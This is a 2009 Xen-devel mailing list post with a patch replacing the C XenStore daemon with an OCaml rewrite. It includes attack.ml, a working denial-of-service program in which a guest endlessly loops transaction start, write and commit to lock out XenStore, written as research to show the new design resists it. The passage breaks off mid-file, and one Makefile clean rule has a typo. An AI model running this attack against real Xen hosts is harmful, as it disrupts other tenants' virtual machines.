From mboxrd@z Thu Jan 1 00:00:00 1970 From: Patrick Colp Subject: Re: OCaml XenStore Date: Thu, 15 Jan 2009 16:49:43 -0800 Message-ID: <496FD9A7.1000603@cs.ubc.ca> References: <49388712.70909@cs.ubc.ca> <493DB45B.2020509@cs.ubc.ca> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="------------080103040208000401080509" Return-path: In-Reply-To: <493DB45B.2020509@cs.ubc.ca> List-Unsubscribe: , List-Post: List-Help: List-Subscribe: , Sender: xen-devel-bounces@lists.xensource.com Errors-To: xen-devel-bounces@lists.xensource.com To: xen-devel@lists.xensource.com Cc: "Andrew Warfield (cs)" List-Id: xen-devel@lists.xenproject.org This is a multi-part message in MIME format. --------------080103040208000401080509 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit After receiving some more feedback, I've fixed some more issues with the build. This patch has been tested against the latest xen-unstable tip (19043). Patrick Patrick Colp wrote: > A few issues with this release have been brought to my attention. The > most important is an include file which was linked to a file in my build > config rather than the system one. The other was the way I was handling > socket connection shutdown. So I've fixed both of these and created a > new patch which is against the current xen-unstable tip (18881). > > Any additional comments would be greatly appreciated. > > > Patrick > > > Patrick Colp wrote: >> Hello all, >> >> A few months ago I released an OCaml version of XenStore. It was >> basically just the C version but written in OCaml. Since then I've put a >> lot of work into it and am ready to release the next version. The code >> has been cleaned up a lot, modularised, and put into classes. >> >> I've improved the transaction system to use optimistic concurrency >> control with copy-on-write. I found that by repeatedly starting a >> transaction, write some data, and committing the transaction from a >> guest domain, it was possible to create a denial-of-service attack on >> XenStore (this attack is included in the release). However, this same >> attack run against this version of the OCaml XenStore does not prevent >> other transactions from committing. >> >> I'm releasing it as a patch against the current tip (18847). It replaces >> the C XenStore with the OCaml one. A tarball of the OCaml XenStore code >> is also available on my website at: >> >> http://cs.ubc.ca/~pjcolp/xenstore-ocaml.tar.bz2 >> >> >> Patrick >> >> >> ------------------------------------------------------------------------ >> >> _______________________________________________ >> Xen-devel mailing list >> Xen-devel@lists.xensource.com >> http://lists.xensource.com/xen-devel > > > ------------------------------------------------------------------------ > > _______________________________________________ > Xen-devel mailing list > Xen-devel@lists.xensource.com > http://lists.xensource.com/xen-devel --------------080103040208000401080509 Content-Type: text/x-patch; name="xenstore-ocaml-1.4.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="xenstore-ocaml-1.4.patch" diff -r 10a8fae412c5 tools/xenstore/COPYING --- a/tools/xenstore/COPYING Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,515 +0,0 @@ -This license (LGPL) applies to the xenstore library which interfaces -with the xenstore daemon (as stated in xs.c, xs.h, xs_lib.c and -xs_lib.h). The remaining files in the directory are licensed as -stated in the comments (as of this writing, GPL, see ../../COPYING). - - - GNU LESSER GENERAL PUBLIC LICENSE - Version 2.1, February 1999 - - Copyright (C) 1991, 1999 Free Software Foundation, Inc. - 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - -[This is the first released version of the Lesser GPL. It also counts - as the successor of the GNU Library Public License, version 2, hence - the version number 2.1.] - - Preamble - - The licenses for most software are designed to take away your -freedom to share and change it. By contrast, the GNU General Public -Licenses are intended to guarantee your freedom to share and change -free software--to make sure the software is free for all its users. - - This license, the Lesser General Public License, applies to some -specially designated software packages--typically libraries--of the -Free Software Foundation and other authors who decide to use it. You -can use it too, but we suggest you first think carefully about whether -this license or the ordinary General Public License is the better -strategy to use in any particular case, based on the explanations -below. - - When we speak of free software, we are referring to freedom of use, -not price. Our General Public Licenses are designed to make sure that -you have the freedom to distribute copies of free software (and charge -for this service if you wish); that you receive source code or can get -it if you want it; that you can change the software and use pieces of -it in new free programs; and that you are informed that you can do -these things. - - To protect your rights, we need to make restrictions that forbid -distributors to deny you these rights or to ask you to surrender these -rights. These restrictions translate to certain responsibilities for -you if you distribute copies of the library or if you modify it. - - For example, if you distribute copies of the library, whether gratis -or for a fee, you must give the recipients all the rights that we gave -you. You must make sure that they, too, receive or can get the source -code. If you link other code with the library, you must provide -complete object files to the recipients, so that they can relink them -with the library after making changes to the library and recompiling -it. And you must show them these terms so they know their rights. - - We protect your rights with a two-step method: (1) we copyright the -library, and (2) we offer you this license, which gives you legal -permission to copy, distribute and/or modify the library. - - To protect each distributor, we want to make it very clear that -there is no warranty for the free library. Also, if the library is -modified by someone else and passed on, the recipients should know -that what they have is not the original version, so that the original -author's reputation will not be affected by problems that might be -introduced by others. - - Finally, software patents pose a constant threat to the existence of -any free program. We wish to make sure that a company cannot -effectively restrict the users of a free program by obtaining a -restrictive license from a patent holder. Therefore, we insist that -any patent license obtained for a version of the library must be -consistent with the full freedom of use specified in this license. - - Most GNU software, including some libraries, is covered by the -ordinary GNU General Public License. This license, the GNU Lesser -General Public License, applies to certain designated libraries, and -is quite different from the ordinary General Public License. We use -this license for certain libraries in order to permit linking those -libraries into non-free programs. - - When a program is linked with a library, whether statically or using -a shared library, the combination of the two is legally speaking a -combined work, a derivative of the original library. The ordinary -General Public License therefore permits such linking only if the -entire combination fits its criteria of freedom. The Lesser General -Public License permits more lax criteria for linking other code with -the library. - - We call this license the "Lesser" General Public License because it -does Less to protect the user's freedom than the ordinary General -Public License. It also provides other free software developers Less -of an advantage over competing non-free programs. These disadvantages -are the reason we use the ordinary General Public License for many -libraries. However, the Lesser license provides advantages in certain -special circumstances. - - For example, on rare occasions, there may be a special need to -encourage the widest possible use of a certain library, so that it -becomes a de-facto standard. To achieve this, non-free programs must -be allowed to use the library. A more frequent case is that a free -library does the same job as widely used non-free libraries. In this -case, there is little to gain by limiting the free library to free -software only, so we use the Lesser General Public License. - - In other cases, permission to use a particular library in non-free -programs enables a greater number of people to use a large body of -free software. For example, permission to use the GNU C Library in -non-free programs enables many more people to use the whole GNU -operating system, as well as its variant, the GNU/Linux operating -system. - - Although the Lesser General Public License is Less protective of the -users' freedom, it does ensure that the user of a program that is -linked with the Library has the freedom and the wherewithal to run -that program using a modified version of the Library. - - The precise terms and conditions for copying, distribution and -modification follow. Pay close attention to the difference between a -"work based on the library" and a "work that uses the library". The -former contains code derived from the library, whereas the latter must -be combined with the library in order to run. - - GNU LESSER GENERAL PUBLIC LICENSE - TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION - - 0. This License Agreement applies to any software library or other -program which contains a notice placed by the copyright holder or -other authorized party saying it may be distributed under the terms of -this Lesser General Public License (also called "this License"). -Each licensee is addressed as "you". - - A "library" means a collection of software functions and/or data -prepared so as to be conveniently linked with application programs -(which use some of those functions and data) to form executables. - - The "Library", below, refers to any such software library or work -which has been distributed under these terms. A "work based on the -Library" means either the Library or any derivative work under -copyright law: that is to say, a work containing the Library or a -portion of it, either verbatim or with modifications and/or translated -straightforwardly into another language. (Hereinafter, translation is -included without limitation in the term "modification".) - - "Source code" for a work means the preferred form of the work for -making modifications to it. For a library, complete source code means -all the source code for all modules it contains, plus any associated -interface definition files, plus the scripts used to control -compilation and installation of the library. - - Activities other than copying, distribution and modification are not -covered by this License; they are outside its scope. The act of -running a program using the Library is not restricted, and output from -such a program is covered only if its contents constitute a work based -on the Library (independent of the use of the Library in a tool for -writing it). Whether that is true depends on what the Library does -and what the program that uses the Library does. - - 1. You may copy and distribute verbatim copies of the Library's -complete source code as you receive it, in any medium, provided that -you conspicuously and appropriately publish on each copy an -appropriate copyright notice and disclaimer of warranty; keep intact -all the notices that refer to this License and to the absence of any -warranty; and distribute a copy of this License along with the -Library. - - You may charge a fee for the physical act of transferring a copy, -and you may at your option offer warranty protection in exchange for a -fee. - - 2. You may modify your copy or copies of the Library or any portion -of it, thus forming a work based on the Library, and copy and -distribute such modifications or work under the terms of Section 1 -above, provided that you also meet all of these conditions: - - a) The modified work must itself be a software library. - - b) You must cause the files modified to carry prominent notices - stating that you changed the files and the date of any change. - - c) You must cause the whole of the work to be licensed at no - charge to all third parties under the terms of this License. - - d) If a facility in the modified Library refers to a function or a - table of data to be supplied by an application program that uses - the facility, other than as an argument passed when the facility - is invoked, then you must make a good faith effort to ensure that, - in the event an application does not supply such function or - table, the facility still operates, and performs whatever part of - its purpose remains meaningful. - - (For example, a function in a library to compute square roots has - a purpose that is entirely well-defined independent of the - application. Therefore, Subsection 2d requires that any - application-supplied function or table used by this function must - be optional: if the application does not supply it, the square - root function must still compute square roots.) - -These requirements apply to the modified work as a whole. If -identifiable sections of that work are not derived from the Library, -and can be reasonably considered independent and separate works in -themselves, then this License, and its terms, do not apply to those -sections when you distribute them as separate works. But when you -distribute the same sections as part of a whole which is a work based -on the Library, the distribution of the whole must be on the terms of -this License, whose permissions for other licensees extend to the -entire whole, and thus to each and every part regardless of who wrote -it. - -Thus, it is not the intent of this section to claim rights or contest -your rights to work written entirely by you; rather, the intent is to -exercise the right to control the distribution of derivative or -collective works based on the Library. - -In addition, mere aggregation of another work not based on the Library -with the Library (or with a work based on the Library) on a volume of -a storage or distribution medium does not bring the other work under -the scope of this License. - - 3. You may opt to apply the terms of the ordinary GNU General Public -License instead of this License to a given copy of the Library. To do -this, you must alter all the notices that refer to this License, so -that they refer to the ordinary GNU General Public License, version 2, -instead of to this License. (If a newer version than version 2 of the -ordinary GNU General Public License has appeared, then you can specify -that version instead if you wish.) Do not make any other change in -these notices. - - Once this change is made in a given copy, it is irreversible for -that copy, so the ordinary GNU General Public License applies to all -subsequent copies and derivative works made from that copy. - - This option is useful when you wish to copy part of the code of -the Library into a program that is not a library. - - 4. You may copy and distribute the Library (or a portion or -derivative of it, under Section 2) in object code or executable form -under the terms of Sections 1 and 2 above provided that you accompany -it with the complete corresponding machine-readable source code, which -must be distributed under the terms of Sections 1 and 2 above on a -medium customarily used for software interchange. - - If distribution of object code is made by offering access to copy -from a designated place, then offering equivalent access to copy the -source code from the same place satisfies the requirement to -distribute the source code, even though third parties are not -compelled to copy the source along with the object code. - - 5. A program that contains no derivative of any portion of the -Library, but is designed to work with the Library by being compiled or -linked with it, is called a "work that uses the Library". Such a -work, in isolation, is not a derivative work of the Library, and -therefore falls outside the scope of this License. - - However, linking a "work that uses the Library" with the Library -creates an executable that is a derivative of the Library (because it -contains portions of the Library), rather than a "work that uses the -library". The executable is therefore covered by this License. -Section 6 states terms for distribution of such executables. - - When a "work that uses the Library" uses material from a header file -that is part of the Library, the object code for the work may be a -derivative work of the Library even though the source code is not. -Whether this is true is especially significant if the work can be -linked without the Library, or if the work is itself a library. The -threshold for this to be true is not precisely defined by law. - - If such an object file uses only numerical parameters, data -structure layouts and accessors, and small macros and small inline -functions (ten lines or less in length), then the use of the object -file is unrestricted, regardless of whether it is legally a derivative -work. (Executables containing this object code plus portions of the -Library will still fall under Section 6.) - - Otherwise, if the work is a derivative of the Library, you may -distribute the object code for the work under the terms of Section 6. -Any executables containing that work also fall under Section 6, -whether or not they are linked directly with the Library itself. - - 6. As an exception to the Sections above, you may also combine or -link a "work that uses the Library" with the Library to produce a -work containing portions of the Library, and distribute that work -under terms of your choice, provided that the terms permit -modification of the work for the customer's own use and reverse -engineering for debugging such modifications. - - You must give prominent notice with each copy of the work that the -Library is used in it and that the Library and its use are covered by -this License. You must supply a copy of this License. If the work -during execution displays copyright notices, you must include the -copyright notice for the Library among them, as well as a reference -directing the user to the copy of this License. Also, you must do one -of these things: - - a) Accompany the work with the complete corresponding - machine-readable source code for the Library including whatever - changes were used in the work (which must be distributed under - Sections 1 and 2 above); and, if the work is an executable linked - with the Library, with the complete machine-readable "work that - uses the Library", as object code and/or source code, so that the - user can modify the Library and then relink to produce a modified - executable containing the modified Library. (It is understood - that the user who changes the contents of definitions files in the - Library will not necessarily be able to recompile the application - to use the modified definitions.) - - b) Use a suitable shared library mechanism for linking with the - Library. A suitable mechanism is one that (1) uses at run time a - copy of the library already present on the user's computer system, - rather than copying library functions into the executable, and (2) - will operate properly with a modified version of the library, if - the user installs one, as long as the modified version is - interface-compatible with the version that the work was made with. - - c) Accompany the work with a written offer, valid for at least - three years, to give the same user the materials specified in - Subsection 6a, above, for a charge no more than the cost of - performing this distribution. - - d) If distribution of the work is made by offering access to copy - from a designated place, offer equivalent access to copy the above - specified materials from the same place. - - e) Verify that the user has already received a copy of these - materials or that you have already sent this user a copy. - - For an executable, the required form of the "work that uses the -Library" must include any data and utility programs needed for -reproducing the executable from it. However, as a special exception, -the materials to be distributed need not include anything that is -normally distributed (in either source or binary form) with the major -components (compiler, kernel, and so on) of the operating system on -which the executable runs, unless that component itself accompanies -the executable. - - It may happen that this requirement contradicts the license -restrictions of other proprietary libraries that do not normally -accompany the operating system. Such a contradiction means you cannot -use both them and the Library together in an executable that you -distribute. - - 7. You may place library facilities that are a work based on the -Library side-by-side in a single library together with other library -facilities not covered by this License, and distribute such a combined -library, provided that the separate distribution of the work based on -the Library and of the other library facilities is otherwise -permitted, and provided that you do these two things: - - a) Accompany the combined library with a copy of the same work - based on the Library, uncombined with any other library - facilities. This must be distributed under the terms of the - Sections above. - - b) Give prominent notice with the combined library of the fact - that part of it is a work based on the Library, and explaining - where to find the accompanying uncombined form of the same work. - - 8. You may not copy, modify, sublicense, link with, or distribute -the Library except as expressly provided under this License. Any -attempt otherwise to copy, modify, sublicense, link with, or -distribute the Library is void, and will automatically terminate your -rights under this License. However, parties who have received copies, -or rights, from you under this License will not have their licenses -terminated so long as such parties remain in full compliance. - - 9. You are not required to accept this License, since you have not -signed it. However, nothing else grants you permission to modify or -distribute the Library or its derivative works. These actions are -prohibited by law if you do not accept this License. Therefore, by -modifying or distributing the Library (or any work based on the -Library), you indicate your acceptance of this License to do so, and -all its terms and conditions for copying, distributing or modifying -the Library or works based on it. - - 10. Each time you redistribute the Library (or any work based on the -Library), the recipient automatically receives a license from the -original licensor to copy, distribute, link with or modify the Library -subject to these terms and conditions. You may not impose any further -restrictions on the recipients' exercise of the rights granted herein. -You are not responsible for enforcing compliance by third parties with -this License. - - 11. If, as a consequence of a court judgment or allegation of patent -infringement or for any other reason (not limited to patent issues), -conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot -distribute so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you -may not distribute the Library at all. For example, if a patent -license would not permit royalty-free redistribution of the Library by -all those who receive copies directly or indirectly through you, then -the only way you could satisfy both it and this License would be to -refrain entirely from distribution of the Library. - -If any portion of this section is held invalid or unenforceable under -any particular circumstance, the balance of the section is intended to -apply, and the section as a whole is intended to apply in other -circumstances. - -It is not the purpose of this section to induce you to infringe any -patents or other property right claims or to contest validity of any -such claims; this section has the sole purpose of protecting the -integrity of the free software distribution system which is -implemented by public license practices. Many people have made -generous contributions to the wide range of software distributed -through that system in reliance on consistent application of that -system; it is up to the author/donor to decide if he or she is willing -to distribute software through any other system and a licensee cannot -impose that choice. - -This section is intended to make thoroughly clear what is believed to -be a consequence of the rest of this License. - - 12. If the distribution and/or use of the Library is restricted in -certain countries either by patents or by copyrighted interfaces, the -original copyright holder who places the Library under this License -may add an explicit geographical distribution limitation excluding those -countries, so that distribution is permitted only in or among -countries not thus excluded. In such case, this License incorporates -the limitation as if written in the body of this License. - - 13. The Free Software Foundation may publish revised and/or new -versions of the Lesser General Public License from time to time. -Such new versions will be similar in spirit to the present version, -but may differ in detail to address new problems or concerns. - -Each version is given a distinguishing version number. If the Library -specifies a version number of this License which applies to it and -"any later version", you have the option of following the terms and -conditions either of that version or of any later version published by -the Free Software Foundation. If the Library does not specify a -license version number, you may choose any version ever published by -the Free Software Foundation. - - 14. If you wish to incorporate parts of the Library into other free -programs whose distribution conditions are incompatible with these, -write to the author to ask for permission. For software which is -copyrighted by the Free Software Foundation, write to the Free -Software Foundation; we sometimes make exceptions for this. Our -decision will be guided by the two goals of preserving the free status -of all derivatives of our free software and of promoting the sharing -and reuse of software generally. - - NO WARRANTY - - 15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO -WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. -EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR -OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY -KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE -IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR -PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE -LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME -THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. - - 16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN -WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY -AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU -FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR -CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE -LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING -RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A -FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF -SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH -DAMAGES. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Libraries - - If you develop a new library, and you want it to be of the greatest -possible use to the public, we recommend making it free software that -everyone can redistribute and change. You can do so by permitting -redistribution under these terms (or, alternatively, under the terms -of the ordinary General Public License). - - To apply these terms, attach the following notices to the library. -It is safest to attach them to the start of each source file to most -effectively convey the exclusion of warranty; and each file should -have at least the "copyright" line and a pointer to where the full -notice is found. - - - - Copyright (C) - - This library is free software; you can redistribute it and/or - modify it under the terms of the GNU Lesser General Public - License as published by the Free Software Foundation; either - version 2.1 of the License, or (at your option) any later version. - - This library is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - Lesser General Public License for more details. - - You should have received a copy of the GNU Lesser General Public - License along with this library; if not, write to the Free Software - Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA - -Also add information on how to contact you by electronic and paper mail. - -You should also get your employer (if you work as a programmer) or -your school, if any, to sign a "copyright disclaimer" for the library, -if necessary. Here is a sample; alter the names: - - Yoyodyne, Inc., hereby disclaims all copyright interest in the - library `Frob' (a library for tweaking knobs) written by James - Random Hacker. - - , 1 April 1990 - Ty Coon, President of Vice - -That's all there is to it! - - diff -r 10a8fae412c5 tools/xenstore/Makefile --- a/tools/xenstore/Makefile Wed Jan 14 13:43:17 2009 +0000 +++ b/tools/xenstore/Makefile Thu Jan 15 15:44:05 2009 -0800 @@ -8,16 +8,55 @@ CFLAGS += -I. CFLAGS += $(CFLAGS_libxenctrl) + +CAMLLIB = $(shell ocamlc -where) +DEF_CPPFLAGS += -I$(CAMLLIB) + +OCAMLFIND=ocamlfind +OCAMLOPT=ocamlopt + + +INCLUDES := -I . +OCAML_LIBS := unix.cmxa +C_LIBS := $(LDFLAGS_libxenctrl) -lpthread -lc + +OBJS := constants.cmx utils.cmx eventchan.cmx interface.cmx xenbus.cmx socket.cmx message.cmx connection.cmx dominfo.cmx trace.cmx store.cmx domain.cmx os.cmx option.cmx watch.cmx permission.cmx transaction.cmx xenstored.cmx process.cmx main.cmx +C_OBJS := xenbus_c.o eventchan_c.o dominfo_c.o main_c.o + +ATTACK_OBJS := constants.cmx utils.cmx interface.cmx socket.cmx message.cmx connection.cmx store.cmx attack.cmx + + +# Build rules + +.PHONY: all default clean + +all: xenstored attack libxenstore.so libxenstore.a clients +default: all + + +# Source build rules + +%.cmx: %.ml + $(OCAMLFIND) $(OCAMLOPT) $(INCLUDES) -c $< -o $@ + +%.o: %.c + $(CC) $(CFLAGS) -I$(CAMLLIB) -c $< -o $@ + + +# Executable build rules + +xenstored: $(OBJS) $(C_OBJS) + $(OCAMLFIND) $(OCAMLOPT) -o xenstored $(OCAML_LIBS) $(OBJS) $(C_OBJS) -ccopt '$(CFLAGS)' -cclib '$(C_LIBS)' -cclib '$(LDFLAGS)' + + +attack: $(ATTACK_OBJS) + $(OCAMLFIND) $(OCAMLOPT) unix.cmxa -o attack $(ATTACK_OBJS) -ccopt '$(CFLAGS)' -cclib '$(C_LIBS)' -cclib '$(LDFLAGS)' + + CLIENTS := xenstore-exists xenstore-list xenstore-read xenstore-rm xenstore-chmod CLIENTS += xenstore-write xenstore-ls -XENSTORED_OBJS = xenstored_core.o xenstored_watch.o xenstored_domain.o xenstored_transaction.o xs_lib.o talloc.o utils.o tdb.o hashtable.o - -XENSTORED_OBJS_$(CONFIG_Linux) = xenstored_linux.o -XENSTORED_OBJS_$(CONFIG_SunOS) = xenstored_solaris.o xenstored_probes.o -XENSTORED_OBJS_$(CONFIG_NetBSD) = xenstored_netbsd.o - -XENSTORED_OBJS += $(XENSTORED_OBJS_y) +XENSTORED_OBJS = xs_lib.o ifneq ($(XENSTORE_STATIC_CLIENTS),y) LIBXENSTORE := libxenstore.so @@ -26,26 +65,10 @@ xenstore xenstore-control: CFLAGS += -static endif -.PHONY: all -all: libxenstore.so libxenstore.a xenstored clients xs_tdb_dump .PHONY: clients clients: xenstore $(CLIENTS) xenstore-control -ifeq ($(CONFIG_SunOS),y) -xenstored_probes.h: xenstored_probes.d - dtrace -C -h -s xenstored_probes.d - -xenstored_solaris.o: xenstored_probes.h - -xenstored_probes.o: xenstored_solaris.o - dtrace -C -G -s xenstored_probes.d xenstored_solaris.o - -CFLAGS += -DHAVE_DTRACE=1 -endif - -xenstored: $(XENSTORED_OBJS) - $(CC) $(CFLAGS) $(LDFLAGS) $^ $(LDFLAGS_libxenctrl) $(SOCKET_LIBS) -o $@ $(CLIENTS): xenstore ln -f xenstore $@ @@ -56,8 +79,6 @@ xenstore-control: xenstore_control.o $(LIBXENSTORE) $(CC) $(CFLAGS) $(LDFLAGS) $< -L. -lxenstore $(SOCKET_LIBS) -o $@ -xs_tdb_dump: xs_tdb_dump.o utils.o tdb.o talloc.o - $(CC) $(CFLAGS) $(LDFLAGS) $^ -o $@ libxenstore.so: libxenstore.so.$(MAJOR) ln -sf $< $@ @@ -72,13 +93,25 @@ libxenstore.a: xs.o xs_lib.o $(AR) rcs $@ $^ + +# Cleaning rules + .PHONY: clean -clean: +clean: clean-xenstored clean attack clean-xs + +clean-xenstored: + rm -f *.a *.o *.cmx *.cmi xenstored + +clean-attack: + rm -f *.a *.o *.cmx *.cmi attack + +clean-xs: rm -f *.a *.o *.opic *.so* xenstored_probes.h - rm -f xenstored xs_random xs_stress xs_crashme - rm -f xs_tdb_dump xenstore-control + rm -f xs_random xs_stress xs_crashme + rm -f xenstore-control rm -f xenstore $(CLIENTS) - $(RM) $(DEPS) + $(RM) $(DEP) + .PHONY: TAGS TAGS: @@ -88,13 +121,13 @@ tarball: clean cd .. && tar -c -j -v -h -f xenstore.tar.bz2 xenstore/ + +# Install rules + .PHONY: install install: all - $(INSTALL_DIR) $(DESTDIR)/var/run/xenstored - $(INSTALL_DIR) $(DESTDIR)/var/lib/xenstored $(INSTALL_DIR) $(DESTDIR)$(BINDIR) $(INSTALL_DIR) $(DESTDIR)$(SBINDIR) - $(INSTALL_DIR) $(DESTDIR)$(INCLUDEDIR) $(INSTALL_PROG) xenstored $(DESTDIR)$(SBINDIR) $(INSTALL_PROG) xenstore-control $(DESTDIR)$(BINDIR) $(INSTALL_PROG) xenstore $(DESTDIR)/usr/bin @@ -109,6 +142,7 @@ $(INSTALL_DATA) xs.h $(DESTDIR)$(INCLUDEDIR) $(INSTALL_DATA) xs_lib.h $(DESTDIR)$(INCLUDEDIR) + -include $(DEPS) # never delete any intermediate files. diff -r 10a8fae412c5 tools/xenstore/README --- a/tools/xenstore/README Wed Jan 14 13:43:17 2009 +0000 +++ b/tools/xenstore/README Thu Jan 15 15:44:05 2009 -0800 @@ -1,5 +1,41 @@ -The following files are imported from the Samba project. We use the versions -from Samba 3, the current stable branch. +OCaml XenStore -talloc.c: samba-trunk/source/lib/talloc.c r14291 2006-03-13 04:27:47 +0000 -talloc.h: samba-trunk/source/include/talloc.h r11986 2005-12-01 00:43:36 +0000 + +This is the second version of the OCaml XenStore daemon. It is functionally +equivalent to the C XenStore daemon, however certain message operations are +unimplemented. These are: DEBUG, RESUME, and SET_TARGET, which I suggested +in the new version of the XenStore protocol are unneeded anyway. + +Due to some broken tools, a hack was added to support values in non-leaf nodes. +This can be found by the Hack type of Node in the Store. Ideally this would be +fixed so that there is no need for the hack. + +The trace and verbose output has been changed slightly to show the domain ID +instead of a hex address. For socket connections, a negative domain ID is used. + +Transactions have been improved to use optimistic concurrency control and +copy-on-write (instead of duplicating the entire store). A denial-of-service +attack has been included in the build. When run against the current version +of XenStore it will prevent any transaction from completing, thus effective +locking out XenStore. However, using the improved transaction implementation +in the OCaml XenStore, this attack no longer succeeds. + + +The development environment was 32-bit Ubuntu 8.10 with the stock OCaml package +version 3.10.2. It has been tested on Ubuntu 8.04 with the latest version of +xen-unstable and OCaml version 3.10.0. + + + +To compile xenstored, the attack, and the libxenstore libraries simply type: + +# make + +To install, type: + +# make install + + +The OCaml XenStore is a drop-in replacement the original C one and will be +compiled when Xen (or the tools) are built and will be installed on to the +system when Xen is installed. diff -r 10a8fae412c5 tools/xenstore/TODO --- a/tools/xenstore/TODO Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,10 +0,0 @@ -TODO in no particular order. Some of these will never be done. There -are omissions of important but necessary things. It is up to the -reader to fill in the blanks. - -- Timeout failed watch responses -- Dynamic/supply nodes -- Persistant storage of introductions, watches and transactions, so daemon can restart -- Remove assumption that rename doesn't fail -- Multi-root transactions, for setting up front and back ends at same time. - diff -r 10a8fae412c5 tools/xenstore/attack.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/attack.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,78 @@ +let xenbus_dev = "/proc/xen/xenbus";; + +let xenbus_open dev = + Unix.openfile dev [ Unix.O_RDWR ] 0o600;; + +let fd = xenbus_open xenbus_dev;; +let in_set = ref [ fd ];; +let out_set = ref [ fd ];; + +let rec read connection = + let (i, o, _) = Unix.select [ fd ] [ fd ] [] (0.0) in + + in_set := i; + out_set := o; + + if (connection#can_read) then ( + match (connection#read) with + | Some (message) -> message + | None -> read connection; + ) else ( + read connection; + );; + +let get_domain_path connection transaction_id domain_id = + connection#write (Message.make Message.XS_GET_DOMAIN_PATH transaction_id 0l (Utils.null_terminate (string_of_int domain_id))); + Utils.strip_null (read connection).Message.payload;; + +let transaction_start connection = + connection#write (Message.make Message.XS_TRANSACTION_START 0l 0l (Utils.null_terminate Constants.null_string)); + Int32.of_string (Utils.strip_null (read connection).Message.payload);; + +let transaction_end connection transaction_id = + connection#write (Message.make Message.XS_TRANSACTION_END transaction_id 0l (Utils.null_terminate "T")); + (Utils.strip_null (read connection).Message.payload) = "OK";; + +let write connection transaction_id path value = + connection#write (Message.make Message.XS_WRITE transaction_id 0l ((Utils.null_terminate path) ^ value)); + (Utils.strip_null (read connection).Message.payload) = "OK";; + +let main () = + Printf.printf "Initialising attack...\n"; flush stdout; + + let domain_id = ref 0 + and verbose = ref false in + + (* Parse command-line arguments *) + Arg.parse [ + ("--domid", Arg.Set_int domain_id, " specify ID of this domain"); + ("--verbose", Arg.Set verbose, " specify ID of this domain"); + ] (fun s -> ()) ""; + + let connection = new Connection.connection (new Socket.socket_interface fd true in_set out_set) in + + Printf.printf "Initialised\n"; + Printf.printf "Getting domain path...\n"; flush stdout; + + let domain_path = get_domain_path connection 0l !domain_id in + + Printf.printf "%s\n" domain_path; flush stdout; + + let attack_path = domain_path ^ Store.dividor_str ^ "attack" + and attack_payload = String.make 1024 'a' in + + Printf.printf "Attacking...\n"; flush stdout; + + let rec attack_loop () = ( + let transaction_id = transaction_start connection in + if (write connection transaction_id attack_path attack_payload) then ( + if (transaction_end connection transaction_id) then (attack_loop ()); + ); + ) + in + + attack_loop (); + + Printf.printf "\nDone\n"; flush stdout;; + +main ();; diff -r 10a8fae412c5 tools/xenstore/connection.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/connection.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,95 @@ +(* + Connections for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +class buffer length = +object (self) + val m_buffer = String.make length Constants.null_char + val mutable m_position = 0 + method private position = m_position + method buffer = String.copy m_buffer + method clear = + String.blit (String.make self#length Constants.null_char) 0 m_buffer 0 self#length; + m_position <- 0 + method length = String.length m_buffer + method remaining = self#length - self#position + method write data = + let length = (String.length data) in + String.blit data 0 m_buffer m_position length; + m_position <- m_position + length +end + +class buffered_message = 